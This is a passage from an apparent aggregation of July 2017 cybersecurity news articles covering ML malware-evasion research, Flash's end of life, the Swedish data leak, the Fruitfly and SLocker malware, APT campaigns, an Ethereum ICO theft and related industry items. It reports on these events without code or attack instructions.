Moyal explained the implications for defenders. "Just like in previous generations of anti-virus software, attackers can constantly evaluate their malware against the machine learning model until a successful variant is created," he told SecurityWeek. Malware authors have long tested new or repackaged malware against VirusTotal-like services to see whether it is likely to get past the defenders' AV defenses. Now they will use ML to test their malware against the known ML defenses, seeking out the blind spots.

"The resulting specimen," continued Moyal, "can be used against each victim whose protection relies on this model, offering the attacker a high degree of certainty the malicious program will not be detected. Attackers can also automate this process of generating malware that bypasses the model and even use offensive machine learning to improve this process."

Anderson's research is based on the idea of finding the blind spots and closing them before the attackers find them. Ironically, this can be achieved by doing exactly what the attackers will do -- use machine learning to probe machine learning. This is nothing more than what security researchers have been doing for decades: probe software to find the weaknesses and get those weaknesses patched before they are found and exploited by the bad people.

In today's presentation, Anderson describes a scientific approach on how to evade malware detection with an AI agent to compete against the malware detector. Although in this instance focusing on Windows PE, the framework is generic and can be used in other domains.

The agent examines a PE file and probes it to find a way to evade the malware detection model. The agent learns how to 'beat' the defense. However, as used by the defenders, this approach simply finds the blind spots that can then be fixed. Used solely by attackers, it finds the blind spots that can be exploited.

Anderson's key takeaway is that machine learning anti malware just bought and installed will offer early success in malware protection, but it will quickly become porous against advanced adversaries. Staying one jump ahead of the bad guys has always been, and remains, the key to infosecurity even in the age of artificial intelligence.

Hyrum Anderson, Bobby Filar, and Phil Roth from Endgame, together with Anant Kharkar from the University of Virginia, have published an associated white paper: Evading Machine Learning Malware Detection (PDF).


IBM Launches Security Testing Services For Cars, IoT

26.7.2017 securityweeek IoT

IBM Security announced on Monday that the services provided by its X-Force Red penetration testing group have been expanded to include connected vehicles and Internet of Things (IoT) devices.

IBM X-Force Red, which the company launched one year ago, has been working with automotive manufacturers and third-party suppliers to provide expertise and penetration testing and consulting services.

Researchers will also apply some of the findings from research disclosed earlier this year into the risks associated with purchasing used connected cars. They showed that insecure transfer of ownership can allow the previous owner to unlock the car, start it remotely and track its location.IBM

Experts, both independent and ones representing security firms, demonstrated on several occasions in the past years that cars can be hacked, and the risk of a cyberattack will only increase as the number of connected vehicles is expected to reach a quarter billion by 2020.

IBM’s X-Force Red team aims to help customers in the automotive industry secure hardware, software, networks and human interactions.

As for IoT testing, the service will leverage IBM’s Watson IoT platform, a cognitive system that allows organizations to easily connect and manage their IoT devices. The product has built-in security controls and IoT threat intelligence capabilities that help organizations visualize risks and develop efficient incident response through policy-driven automations.

IBM customers using the Watson IoT platform can get help from the X-Force Red team in ensuring that their products are secure from development to deployment.

“It’s not just about the technology, it is also about the global reach, investment, and collaborative approach which make IBM a trusted IoT partner for enterprise IoT solutions,” said James Murphy, Offering Manager, IBM Watson IoT Platform. “With IoT technologies permeating the farthest corners of industry, IBM is bringing our Watson IoT Platform and X-Force Red security talent together to address present and future concerns.”


Adobe to Kill Flash Player, End Support by 2020

26.7.2017 securityweeek IT

[Breaking] Adobe on Tuesday said that it would kill its Flash Player and stop providing security updates by the end of 2020.

Adobe Flash Player has made headlines over the years due to the large number of serious vulnerabilities identified by both white and black hat hackers. The company has been forced to issue emergency patches on several occasions after learning that malicious actors had been exploiting unpatched Flash Player vulnerabilities in their operations.

According the company, the decision was made in collaboration with several Adobe technology partners including Apple, Facebook, Google, Microsoft and Mozilla.

“Specifically, we will stop updating and distributing the Flash Player at the end of 2020 and encourage content creators to migrate any existing Flash content to these new open formats,” Adobe said.

Adobe said it would continue to support Flash on a number of major OSs and browsers that currently support Flash content through the planned EOL.

“This will include issuing regular security patches, maintaining OS and browser compatibility and adding features and capabilities as needed,” Adobe said in a blog post. “We remain fully committed to working with partners, including Apple, Facebook, Google, Microsoft and Mozilla to maintain the security and compatibility of Flash content.”

While Adobe has officially made the decision to kill-off the vulnerable software product, many other leading internet firms have been pushing hard against the software over the past years and trying to limit the use of Flash across their products and services.

In May 2016, Google announced its plans to block Adobe Flash and implement an 'HTML5 by Default' policy on Chrome by the end of 2016.

“It is time for Adobe to announce the end-of-life date for Flash and to ask the browsers to set killbits on the same day,” Facebook’s CSO, Alex Stamos, said in July 2015 after the existence of several Flash Player zero-day flaws was brought to light by the data breach suffered by Italian spyware maker Hacking Team.

In June 2016, Google stopped accepting display ads built in Adobe Flash, not long after Amazon stopped accepting Flash ads on its online shopping website. At the time, Amazon said that the move, which went into effect on Sept. 1, 2015, was prompted by browser setting in Chrome, Firefox, and Safari, which were meant to limit Flash content displayed on web pages.

Nathan Wenzler, chief security strategist at security consulting company AsTech, believes there will be a lot of split feelings about the official EOL announcement for Flash.

“On one hand, a great deal of the multimedia games, videos, graphics and other rich services that have helped make the Internet what it is today were originally built on Flash. It provided a great platform for a huge array of products, and it could be argued we wouldn't be where we are today without it,” Wenzler told SecurityWeek. “That said, the security world will likely rejoice at the retirement of a product which has had a huge number of well-known vulnerabilities and flaws over the years, which have been the entry point for malicious tools that have compromised millions of systems across the globe.”

“While Adobe has been increasingly more vigilant about hardening Flash and more consistently providing patches and hotfixes whenever a vulnerability was identified, it still served as a particular pain point for a lot of organizations to keep Flash patched and maintain a consistent security posture for their systems which had Flash installed,” Wenzler added.

Chris Roberts, chief security architect at threat detection and defense solutions provider Acalvio, pointed out that the end of Flash Player has been coming for a while.

“It’s been good while we had it, but let’s face it, it’s been a whipping boy of the security industry for a while with more than 1000 CVE’s dedicated to it throughout the years,” Roberts said via email. “Kind of like many of us in the industry that find ourselves getting grayer and less tolerant of others, it’s time to hang up the hat and work out how to retire. At least in Flash’s world, it’s been given a nice sunset (until 2020) and probably a good pension in the vaults of software somewhere.”

Flash Player was originally developed by Macromedia, which was acquired by Adobe in 2005.


Sweden Rattled by Massive Confidential Data Leak

26.7.2017 securityweeek BigBrothers

Sweden's minority government was battling to contain the fallout Monday after a massive leak that may have made confidential military information accessible abroad, as well as the private data of millions of citizens.

The leak made an entire database on Swedish drivers' licenses available to technicians in the Czech Republic and Romania, with media reporting that the identities of intelligence agents may have been jeopardized.

"What has happened is an accident," Prime Minister Stefan Lofven told a news conference in Stockholm, adding that an investigation has been launched.

"It has happened in violation of the law and exposed Sweden and Swedish citizens to harm," Lofven said.

One of the largest breaches of government information in Sweden in decades, the scandal may threaten the ruling Social Democrat-led coalition as opposition parties have said they could put the issue to a confidence vote in parliament.

The leak stems from the transport agency's hiring of IBM in 2015 to take over its IT operations.

IBM in turn used subcontractors in the Czech Republic and Romania -- making the sensitive information accessible by foreign technicians.

- 'Keys to the kingdom' -

The transport agency's director general Maria Agren resigned in January for unknown reasons, but she has since confessed to violating data handling and accepted a fine of 70,000 Swedish kronor (around 7,000 euros, $8,000), according to media reports earlier this month.

The Swedish military said in a statement Saturday that information on its personnel, vehicles and defense and contingency planning could have been amongst the leaked data.

But the transport agency has denied having a register on military vehicles and added that "nothing indicates" the leaked information has been "spread in an improper way".

An official at the agency told the Dagens Nyheter newspaper that carelessness with Swedes' data was like "giving away the keys to the kingdom".

Grilled by reporters on Monday, Lofven said he was told about the leak in January by his state secretary.

Defense Minister Peter Hultqvist and Interior Minister Anders Ygeman had known about it since 2016, according to several media reports.

And Infrastructure Minister Anna Johansson, who oversees the transport agency, told TT news agency on Sunday that her former state secretary had known about the leak but kept the information hidden from her -- triggering outrage among opposition parties.

"(The fact) that a responsible minister didn't know what happened within her own field provides no confidence at all," Jonas Sjostedt, leader of the Left party, told TT.

Annie Loof, leader of the Centre party, said in a statement Sunday that "a vote of no-confidence would not be excluded".


Fruitfly macOS and OS X backdoor remained undetected for years
26.7.2017 securityaffairs Apple

A new mysterious strain of macOS and OS X malware dubbed Fruitfly went undetected by malware researchers and security software for at least five years.
Fruitfly is a backdoor that could be used by attackers to gain full control over the infected systems by implementing many spying features.

Fruitfly has the ability to capture screenshots, keystrokes, webcam images, and steal data from the infected Mac.

Patrick Wardle, chief security researcher at Synack and former NSA analyst, has analyzed a sample of the malware and will present his findings this week at the hacking conference Black Hat.

The expert has built a custom command and control server to examine the FruitFly backdoor, he announced the release a number of tools used for his analysis, including a user-mode process monitor.

fruitfly malware slide1

It has been estimated that the number of infected devices is roughly 400 and likely much higher.

““[FruitFly] was designed in a way to be interactive,” explained Wardle “This can move the mouse, generate presses and interact with the UI elements of the operating system.””

The FruitFly sample analyzed by Patrick Wardle is a variant of a malware that was spotted in January by experts at Malwarebytes after being undetected for at least two years.

After the discovery of the malware in January, Apple updated macOS to automatically detect the malware, but the strain of malware found by Wardle remained undetected by macOS security system and antivirus products.

The Fruitfly malware relies on functions that were deprecated long ago and uses a crude method to gain persistence. Compared to other Mac malware it is much easier to detect.

A submission to the VirusTotal malware detection service shows that only 22 out of 57 Antivirus are able to detect the malware.

The analysis of the malware allowed Wardle to decrypt several backup domains that were hardcoded, and the good news is that the domains remained available allowing him to register one of them.

The expert set up a “sink hole” with the registered domain and noticed that close to 400 infected Macs connected to the server, most of them from United States. Although Wardle did nothing more than

Wardle explained that the was able to send commands to the infected machine to spy on the victims, but he did not do it to respect their privacy.

Wardle explained that the method of infection is still unknown, he suspects the victims were tricked into clicking malicious links.

Wardle also explained that it is still unclear the real motivation of the attackers, the malware in fact, is not able to steal payment card data or to deliver other malicious payloads to monetize the effort of the attackers (i.e. ransomware).

Anyway the fact that the malware targets home users led the researchers to exclude the involvement of a nation-state attacker.

“I don’t know it if it’s just some bored person or someone with perverse goals,” Wardle said. “If some bored teenager is spying on me, that would still be very emotionally traumatic. If it’s turning on the webcam, that’s for perverse reasons.”

The researcher believes that Fruitfly was therefore abandoned by its creators, but the victims are still exposed to anyone who is able to impersonate a C&C server included in the list of hardcoded domains.

Wardle reported his findings to law enforcement and all hardcoded domains are no longer available to avoid abuses.

Wardle developed a set of tools for its investigation, such as BlockBlock for detecting persistence mechanisms and OverSight for detecting webcam alerts.

Don’t miss the Wardle speech at the Black Hat Security Conference in Las Vegas, it is titled Offensive Malware Analysis: Dissecting OSX/Fruitfly via a custom C&C Server.


Veritaseum – Hacker Steals $8.4 Million in Ethereum, for the second time during the ICO
26.7.2017 securityaffairs Incindent

Veritaseum – An unknown hacker has stolen nearly $8.4 Million worth of Ethereum cryptocurrency, for the second time during the ICO.
A clamorous cyber heist makes the headlines, an unknown hacker has stolen nearly $8.4 Million worth of Ethereum cryptocurrency, the hack hit Veritaseum Initial Coin Offering (ICO).

This is the fourth Ethereum cyber heist this month, for the second time hackers exploited the ICO to steal the precious crypto currencies.

Last week, a hacker stole $7 Million in Ethereum from CoinDash in just 3 minutes after the ICO launch, he tricked investors into sending ETH to the wrong address.

Veritaseum

A few days ago, a hacker stole nearly $32 Million worth of Ethereum from wallet accounts by exploiting a critical flaw in the Parity’s Ethereum Wallet software. A third cyber heist of $1 Million worth of Ether and Bitcoins affected the currency exchange Bithumb earlier June.

Back to the present, Veritaseum confirmed the security breach, a hacker stole $8.4 Million in Ether (ETH) from its ICO on July 23. Further investigation is ongoing, it is still unclear which vulnerability was exploited by the hacker.

“We were hacked, possibly by a group. The hack seemed to be very sophisticated, but there’s at least one corporate partner that may have dropped the ball and be liable. We will let the lawyers sort that out if it goes that far.” said Veritaseum founder Reggie Middleton.

“The hacker(s) made away with $8.4M worth of tokens, and dumped all of them within a few hours into a heavy cacophony of demand. This is without the public knowing anything about our last traction.

I would like to make it known that we had the option to fork VERI, but chose not to. At the end of the day, the amount stolen was miniscule (less than 00.07%) although the dollar amount was quite material.”

Middleton speculates that an unnamed third-party company may be responsible for the attack. According to Middleton, due to the high demand of the VERI tokens during the ICO held over the weekend, the hacker first managed to steal those tokens and then immediately sold them to other buyers “within a few hours.”

The hacker first dumped the stolen funds into two separate Ethereum wallets and then moved them to other accounts.

The hacker has stolen 37,000 VERI tokens out of 100 Million in the cyber heist, this means that the event will not impact ICO investors.

“There are 100M tokens issued; the hackers stole about 37k. As I said, it is quite disconcerting, but it is not the end [of] the world. In the scheme of things, this is small,” added Middleton.
“The tokens were stolen from me, not the token buyers. I am not downplaying the seriousness of the heist either, but I am looking at the heist for what it is. A company that we use was compromised, the vulnerability was closed, and we are investigating whether we should move against that company or not.”


Experts detailed the new Operation Wilted Tulip campaign of the CopyKittens APT
26.7.2017 securityaffairs
APT

Researchers from ClearSky and Trend Micro uncovered a new massive cyber espionage campaign conducted by CopyKittens dubbed ‘Operation Wilted Tulip’
A joint investigation conducted by experts from the Israeli cyber-intelligence firm by ClearSky and Trend Micro uncovered a new massive cyber espionage campaign dubbed ‘Operation Wilted Tulip’ conducted by an Iran-linked APT group CopyKittens (aka Rocket Kittens).

CopyKittens report

The hackers targeted government and academic organizations in various countries, according to the experts the group has been active since at least since 2013.

In 2015, ClearSky detected new activity from the Rocket kitten APT group against 550 targets, most of which are located in the Middle East.

The CopyKittens hackers targeted organisations and individuals in Israel, Saudi Arabia, Turkey, the United States, Jordan and Germany.

The joint report published by ClearSky and Trend Micro includes details on the Operation Wilted Tulip and described the TTPs (techniques, tactics, and procedures) adopted by the Rocket Kittens APT group.
“CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date, and are analyzed in this report: TDTESS backdoor; Vminst, a lateral movement tool; NetSrv, a Cobalt Strike loader; and ZPP, a files compression console program. The group also uses Matryoshka v1, a selfdeveloped RAT analyzed by ClearSky in the 2015 report, and Matryoshka v2 which is a new version, albeit with
similar functionality. The group often uses the trial version of Cobalt Strike3 , a publicly available commercial software for “Adversary Simulations and Red Team Operations.” states the report .

“Other public tools used by the group are Metasploit, a well-known free and open source framework for developing and executing exploit code against a remote target machine;
Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, “a PowerShell and Python post-exploitation agent.” For detection and exploitation of internet-facing web servers, CopyKittens use Havij, Acunetix and sqlmap.”

The hackers used both spear phishing attacks and watering holes to compromise target systems.

CopyKittens compromised websites of media outlets and organizations to deliver its malware. Among the websites compromised by hackers to conduct watering hole attacks, there is The Jerusalem Post, the Maariv news and IDF Disabled Veterans Organization.

Below the full list of methods used by CopyKittens in its campaigns.

Watering hole attacks – inserting malicious JavaScript code into breached strategic websites.
Web based exploitation – emailing links to websites built by the attackers and containing known exploits.
Malicious documents – email attachments containing weaponized Microsoft Office documents.
Fake social media entities – fake personal and organizational Facebook pages are used for interaction with targets and for information gathering.
Web hacking – Havij, Acuntix and sqlmap are used to detect and exploit internet-facing web servers.
The hackers used multiple tools and malware to infect targets, they used both custom malicious codes and commercial solutions like Cobalt Strike.the report!


Adobe Flash end of life announced by 2020. Start thing of the migration
26.7.2017 securityaffairs IT

Adobe announced Flash end-of-life by 2020. Apple, Facebook, Google, Microsoft and Mozilla plans to stop supporting the Adobe Flash Media Player in 2020.
It’s official, Adobe will kill Flash by 2020, the company will stop providing support for the popular browser plugin.by the end of that year.

“Given this progress, and in collaboration with several of our technology partners – including Apple, Facebook, Google, Microsoft and Mozilla – Adobe is planning to end-of-life Flash. Specifically, we will stop updating and distributing the Flash Player at the end of 2020 and encourage content creators to migrate any existing Flash content to these new open formats.” states the Adobe’s announcement.

Open standards like HTML5, WebGL, and WebAssembly have matured enough over the past years to replace all the features today implemented by Adobe Flash.

Starting from 2020, the company will no more provide support on major browsers, including Chrome, Firefox, and Internet Explorer and Edge.

“If the site continues to use Flash, and you give the site permission to run Flash, it will work through the end of 2020.” wrote Google. “We’re supportive of Adobe’s announcement today, and we look forward to working with everyone to make the web even better. “

“To provide guidance for site authors and users that continue to rely on Flash, Mozilla has updated its published roadmap for Flash in Firefox. Starting next month, users will choose which websites are able to run the Flash plugin.” states Firefox. “Flash will be disabled by default for most users in 2019, and only users running the Firefox Extended Support Release (ESR) will be able to continue using Flash through the final end-of-life at the end of 2020. In order to preserve user security, once Flash is no longer supported by Adobe security patches, no version of Firefox will load the plugin.”

According to Google, Flash usage had gone down from 80% to 17%.

Adobe Flash end of life

In a similar way, Microsoft also announced the end of support for its products.

“We will phase out Flash from Microsoft Edge and Internet Explorer, culminating in the removal of Flash from Windows entirely by the end of 2020. This process began already for Microsoft Edge with Click-to-Run for Flash in the Windows 10 Creators Update.” states Microsoft.

Facebook also announced that it will shut off Flash games by the end of 2020.

Administrators of Websites that rely on Flash are being encouraged to start planning the migration to new technologies.

Under the cyber security perspective, the Adobe Flash end of life is a good news because it is one of the most exploited software in recent cyber attacks.


32M Becomes First-Ever Company to Implant Micro-Chips in Employees
25.7.207 thehackernews Privacy

Biohacking could be a next big thing in this smart world.
Over two years ago, a hacker implanted a small NFC chip in his left hand right between his thumb and his pointer finger and hacked Android smartphones and bypassed almost all security measures, demonstrating the risks of Biohacking.
At the end of the same year, another hacker implanted a small NFC chip with the private key to his Bitcoin wallet under his skin, making him able to buy groceries or transfer money between bank accounts by just waving his hand.
And this is soon going to be a reality, at least in one tech company in Wisconsin.
Marketing solution provider Three Square Market (32M) has announced that it had partnered with Swedish biohacking firm BioHax International for offering implanted microchips to all their employees on 1st August, according to the company's website.
Although the programme is optional, the company wants at least more than 50 of its employees to undergo the Biohacking procedure.
Like previous bio hacks, the chips will be implanted underneath the skin between the thumb and forefinger, and will also use near-field communications (NFC) — the same technology that makes contactless credit cards and mobile payments possible — along with radio-frequency identification (RFID).

According to the company, the implanted chips would allow its employees to log into their office computers, pay for food and drink from office vending machines, open doors and use the copy machine, among other purposes.
The company CEO has also confirmed that 'there's no GPS tracking at all.'
"We foresee the use of RFID technology to drive everything from making purchases in our office break room market, opening doors, use of copy machines, logging into our office computers, unlocking phones, sharing business cards, storing medical/health information, and used as payment at other RFID terminals," 32M chief executive Todd Westby said.
"Eventually, this technology will become standardised allowing you to use this as your passport, public transit, all purchasing opportunities, etc."
Interested employees will be chipped at the 32M inaugural "chip party" on 1st August at the company's headquarters in River Falls, Wisconsin.
Three Square Market is considered as a leader in micro market technology, which designs mini-convenience stores using a self-checkout kiosk (vending machines), often found in large companies.
The company has more than 2,000 kiosks in nearly 20 different countries, and it operates over 6,000 kiosks in TurnKey Corrections, the firm's corrections industry business.
While the Biometric information and technology are experiencing an increase in popularity, it also raises widespread concerns around the safety and privacy of people adopting it.
Hackers could misuse the technology used to provide easiness to the public against the public itself, and one should not forget that with the advance in technology, the techniques used by cyber criminals also improves.


One in Ten U.S. Organizations Hit by WannaCry: Study

25.7.207 securityweek  Ransomware

A recent survey discovered that the vast majority of organizations in the United States weren’t prepared for the WannaCry ransomware attack, but just one in ten ended up being infected by the malware.

WannaCry stormed the world in mid-May by leveraging a previously patched exploit called EternalBlue, which hacker group Shadow Brokers allegedly stole from the NSA-linked Equation Group. The ransomware mostly infected Windows 7 computers that hadn’t been patched in due time, and also revealed the destructive impact of a global outbreak. NotPetya confirmed the risk in late June.

According to a survey (PDF) from software lifecycle automation solutions provider 1E, 86% of the organizations in the U.S. had to “divert significant resources” to safeguard themselves during the WannaCry attack. Only 14% of the respondents revealed their organization was prepared for such an attack.

The study also shows that 86% of organizations don’t apply patches immediately after they are released, thus leaving endpoints and entire networks exposed to such attacks. While 14% of respondents said they apply patches immediately, 36% apply them within one week after release, and 27% need up to a month for that, while 23% don’t apply patches within a month after release.

It’s no surprise that 70% of the 400+ U.S. IT professionals responding to the survey said they had to work over at least one weekend as a result of the WannaCry attack, while one in ten admitted to having worked three or more weekends.

The fact that most organizations aren’t prepared for attacks that exploit already patched vulnerabilities is also reflected in the percentage of respondents who said they already migrated to Windows 10: 11%. While 53% said they are currently migrating to Microsoft’s latest platform iteration, 28% said they are planning on doing so this year or the next, while 8% said they had no such plan.

Following the WannaCry incident, awareness appears to have increased regarding the benefits of applying the necessary patches in due time. 71% of respondents said their intent to stay updated has improved (the percentage rises to 87% when infected organizations are concerned), while 74% said “the experience of reacting to WannaCry has left them better prepared for future threats.”

However, 87% of organizations aren’t taking steps to accelerate their migration to Windows 10, despite the looming risks. Furthermore, 73% of respondents said management didn’t make more resources available to IT to help it apply patches faster and/or accelerate its OS migration.

“There is growing a concern that we have entered an era in which this kind of attack becomes the new normal. It's more important than ever that organizations stay current and ensure that software is kept up-to-date and fully patched at all times. WannaCry was a huge wakeup call that elevated security concerns to boardroom level -- IT teams can't afford to leave their organizations exposed,” Sumir Karayi, founder and CEO of 1E, said.


Researcher Analyzes Psychology of Ransomware Splash Screens

25.7.207 securityweek  Ransomware

The 'splash screens' of seventy-six different types of ransomware have been analyzed by a cyber-psychologist from De Montfort University. Commissioned by SentinelOne, the subsequent report 'Exploring the Psychological Mechanisms used in Ransomware Splash Screens' (PDF) is designed to reveal how social engineering tactics are used by cyber criminals to manipulate and elicit payments from individuals.

All successful ransomware infections have one common factor -- an explanatory instruction screen to describe what has happened and explain how the victims can recover their files through the payment of a ransom. It is these explanatory screens that comprise the 'splash screens' that are analyzed.

The content and design of the splash screens varies widely but they all have the same intention: to ensure that the victim pays up. "The argument presented in the current report," writes the author, Dr Lee Hadlington, "suggests that these tactics are closely aligned to the concept of social engineering, working on aspects of fear, urgency, scarcity, authority and, in some cases, humor."

He admits that it isn't clear whether the use of archetypal social engineering methods is by design or imitation; but they do occur. The primary social engineering techniques are 'urgency' ('pay within a short deadline or the fee will double'); fear ('or you will lose all of your personal files'); authority ('you must do what I say'); and -- sometimes -- approachability ('email me if you need further instructions').

Hadlington says, "We know that psychology plays a significant part in cyber crime -- what's been most interesting from this study is uncovering the various ways that key social engineering techniques are used to intimidate or influence victims. With ransomware on the rise, it's important that we improve our understanding of this aspect of the attack and how language, imagery and other aspects of the initial ransom demand are used to coerce victims."

While the analysis of the splash screens is interesting and thorough, it does not explain why it is important to understand a technique (social engineering) that is already well-understood and thoroughly analyzed. Furthermore, there is no ability to study the effectiveness of the social engineering techniques (which would at least benefit social engineering research if not ransomware research).

One difficulty is that we do not fully understand the underlying purpose of this social engineering. David Harley, a senior research fellow with ESET, has his own thoughts. "As I see it, the importance of social engineering in notifications lies mostly in these areas," he told SecurityWeek in an emailed comment: "[firstly] pressuring the victim into taking the desirable action of paying up more or less immediately, rather than exploring other options. Especially if there's a risk that grey- or whitehat researchers will come up with a way of recovering data without paying.

"[Secondly] pressuring the victim into paying for recovery of data that aren't actually lost; and [thirdly] pressuring the victim into paying for recovery of data for which the criminals don't actually have a recovery mechanism, before some interfering security researcher points out that paying up doesn't achieve anything."

The big weakness in the report is the inability to measure the effectiveness of the splash screens. This is something that the author admits: "Not all splash screens are the same -- there is a distinct difference in terms of the level of sophistication of mechanisms used to gain payment, presentation of the splash screens and provision of information for further contact. However, there is no further data to explore how such differences map to their success in terms of eliciting payment."

Tony Rowan, a director at SentinelOne, accepts the difficulty in measuring the success of the different splash screens. "This is an interesting area," he told SecurityWeek, "and we have looked for data to use in a correlation exercise. At this stage, the payment data is too disparate and unverifiable to be useful for a correlation exercise, though this is an area we will continue to look at."

But as Harley adds, "As someone with a background in social sciences, I find these questions rather interesting; but from an academic point of view, without subjective data to draw on which aren't present in this study, they're just conjecture."

Without the ability to measure the effectiveness of the different splash screens, there can be no serious conclusions from the analysis. This is admitted: "By expanding the current work with more empirical research, a clearer understanding of why certain ransomware splash screens are more successful at eliciting a payment over others could be obtained," writes Hadlington. "Such information could in turn be used to provide effective mitigation techniques for such attacks, as well as giving both investigators and victims a clearer pathway for help and advice in the event of an attack."

But even then, it is not at all clear how understanding the efficiency of different social engineering techniques in splash screens could help provide 'effective mitigation techniques for such attacks'. It has to be said that this research will be of more interest to students of social engineering than to students of cyber security.


Misconfigured Google Groups Expose Sensitive Data

25.7.207 securityweek IT

Researchers at cloud security firm RedLock believe hundreds of organizations may be exposing highly sensitive information by failing to properly configure Google Groups.

Google Groups is a service that allows users to create and take part in online forums and email-based groups. When a group is configured, its creator has to set sharing options for “Outside this domain - access to groups” to either “Private” or “Public on the Internet.”

RedLock’s Cloud Security Intelligence (CSI) team noticed that many Google Groups for Business users have allowed access to their groups from the Internet, and in some cases the configuration error has resulted in the exposure of sensitive information.

Researchers have found names, email and home addresses, employee salary data, sales pipeline data, and customer passwords in the exposed groups.

“We only looked for a sample of such cases and found dozens,” RedLock told SecurityWeek. “Extending that, there are likely hundreds of companies affected by this misconfiguration.”

According to RedLock, the list of affected firms includes IBM’s The Weather Company, which operates weather.com, intellicast.com and Weather Underground; Fusion Media Group, which owns Gizmodo, The Onion, Jezebel and Lifehacker; video ad platform SpotX, which delivers ads to 600 million people worldwide every month; and cloud-based helpdesk support provider Freshworks, whose software is used by more than 100,000 companies.

Organizations using Google Groups have been advised to immediately check their settings to ensure that access is set to private in order to avoid leaking sensitive data.

Organizations Expose Sensitive Data via Misconfigured Google Groups

“Simple misconfiguration errors – whether in SaaS applications or cloud infrastructure – can have potentially devastating effects,” said Varun Badhwar, CEO and co-founder of RedLock.

Badhwar pointed to the recent incidents involving Deep Root Analytics, WWE and Booz Allen Hamilton as examples of the impact such simple errors can have.

“This new issue that the RedLock CSI team discovered has led to the exposure of sensitive information from hundreds of companies simply through the click of a button,” Badhwar explained. “In today’s environment, it’s imperative that every organization take steps to educate employees on security best practices and leverage tools that can automate the process of securing applications, workloads and other systems. In the cloud, for example, a resource only exists for 127 minutes on average – there’s no way for IT teams alone to keep up with this rapid rate of change.”


Spring Dragon APT used more than 600 Malware samples in different attacks
25.7.207 securityaffairs
APT

The threat actor behind Spring Dragon APT has been developing and updating its wide range of tools throughout the years, new attacks reported in South Asia.
According to a new report published by Kaspersky Lab, the China-linked APT group Spring Dragon (aka Lotus Blossom, Elise, and Esile) has used more than 600 malware samples in its attacks over the past years.
The Spring Dragon APT group is a state-sponsored group that has been around since at least 2012, but further evidence collected by the researchers suggests that it may have been active since 2007.

The APT group focused its cyber espionage campaigns on military and government organizations in Southeast Asia.
In June 2015, Trend Micro published a report on a targeted attack campaign of the group that hit organizations in various countries in the Southeast Asian region. The experts speculated the involvement of state-sponsored hackers due to the nature of the stolen information.

“The Esile targeted attack campaign targeting various countries in the Southeast Asian region has been discussed in the media recently. This campaign – which was referred to by other researchers as Lotus Blossom – is believed to be the work of a nation-state actor due to the nature of the stolen information, which is more valuable to countries than either private companies or cybercriminals.” wrote Trend Micro.

In October 2015, the Lotus Blossom group launched a new espionage campaign using fake invitations to Palo Alto Networks’ Cybersecurity Summit held in Jakarta, on November 3.

Back to the present, researchers from Kaspersky Lab were informed by a research partner in Taiwan of a new wave of attacks powered by the APT group.

“Information about the new attacks arrived from a research partner in Taiwan and we decided to review the actor’s tools, techniques and activities.” states the analysis from Kaspersky Lab.

“Using Kaspersky Lab telemetry data we detected the malware in attacks against some high-profile organizations around the South China Sea.”

The hackers also targeted political parties, educational institutions, and companies in the telecommunications industry.

Most infections were observed in countries around the South China Sea, including Taiwan, Indonesia, Vietnam, the Philippines, Hong Kong, Malaysia, and Thailand.

Spring Dragon attacks

Spring Dragon is known for spear phishing and watering hole attacks, malware researchers at Kaspersky Lab collected a large set composed of more than 600 malware samples used in different attacks.
The APT group has a huge cyber arsenal, it has been developing and updating its range of tools throughout across the years. The hackers have various backdoor modules with unique characteristics and functionalities, it manages a large Command and Control infrastructure that includes more than 200 unique IP addresses and C&C domains.

Most C&C servers used by Spring Dragon are located in Hong Kong and the United States, other servers have also been found in Germany, China and Japan.

“The large number of samples which we have managed to collect have customized configuration data, different sets of C2 addresses with new hardcoded campaign IDs, as well as customized configuration data for creating a service for malware on a victim’s system. This is designed to make detection more difficult.” continues the analysis.

“All the backdoor modules in the APT’s toolset are capable of downloading more files onto the victim’s machine, uploading files to the attacker’s servers, and also executing any executable file or any command on the victim’s machine. These functionalities enable the attackers to undertake different malicious activities on the victim’s machine.”

The analysis of the malware compilation timestamps revealed that attackers might be in the GMT+8 time zone, the same of countries like China, Indonesia, Malaysia, Mongolia, Singapore, Taiwan, the Philippines and Western Australia.

Another interesting information emerged from the analysis is that the malware has been compiled by two different groups, one of which may be in Europe.

“It also suggests that either there is a second group working another shift in the same time zone or the attackers are cross-continental and there is another group, possibly in Europe. The uneven distribution of timestamps (low activity around 10am, 7-8pm UTC) suggests that the attackers didn’t change the timestamps to random or constant values and they might be real.” states the analysis.

“The number of malware samples which we managed to collect (over 600) for the group surpassed many others, and suggests an operation on a massive scale. It’s possible that this malware toolkit is offered in specialist public or private forums to any buyers, although, to date, we haven’t seen this.”


SLocker source code leaked online for free, a gift for crooks and hackers
24.7.2017 securityaffairs 
Ransomware

The SLocker source code leaked online, it is one of the oldest mobile lock screen and file-encrypting ransomware.
The source code of the SLocker Android malware, one of the most popular Android ransomware families, has been leaked online for free, allowing crooks to develop their own variant of the threat.

SLocker was first spotted in 2015, it is the first ransomware to encrypt Android files.

The SLocker source code has been leaked on GitHub by a user who uses the online moniker “fs0c1ety,” the hacker is inviting everyone to contribute to the code and submit bug reports.

“The SLocker family is one of the oldest mobile lock screen and file-encrypting ransomware and used to impersonate law enforcement agencies to convince victims to pay their ransom.” states fs0c1ety.

“All contributions are welcome, from code to documentation to design suggestions to bug reports. Please use GitHub to its fullest– contribute Pull Requests, contribute tutorials or other wiki content– whatever you have to offer, we can use it!”

SLocker source code Android ransomware

The SLocker, aka Simple Locker, is a mobile ransomware that locks victims’ mobile devices and requests the payment of a ransom to unlock them.

The malware impersonates law enforcement agencies to convince victims to pay the ransom, it infected thousands of Android devices in 2016.

According to the experts, more than 400 new variants of the SLocker ransomware were observed in the wild in May, while in May researchers at Trend Micro found a variant mimicking the WannaCry GUI .

“This particular SLocker variant is notable for being an Android file-encrypting ransomware, and the first mobile ransomware to capitalize on the success of the previous WannaCry outbreak.” reads the analysis published by Trend Micro.

“While this SLocker variant is notable for being able to encrypt files on mobile, it was quite short-lived. Shortly after details about the ransomware surfaced, decrypt tools were published. And before long, more variants were found. Five days after its initial detection, a suspect supposedly responsible for the ransomware was arrested by the Chinese police. Luckily, due to the limited transmission channels (it was spread mostly through forums like QQ groups and Bulletin Board Systems), the number of victims was very low.”

Once infected the mobile device, SLocker runs silently in the background and encrypts any kind of file on the smartphone, including images, documents, and videos.

The ransomware is also able to hijack the mobile device, making impossible for the owners to access the device.

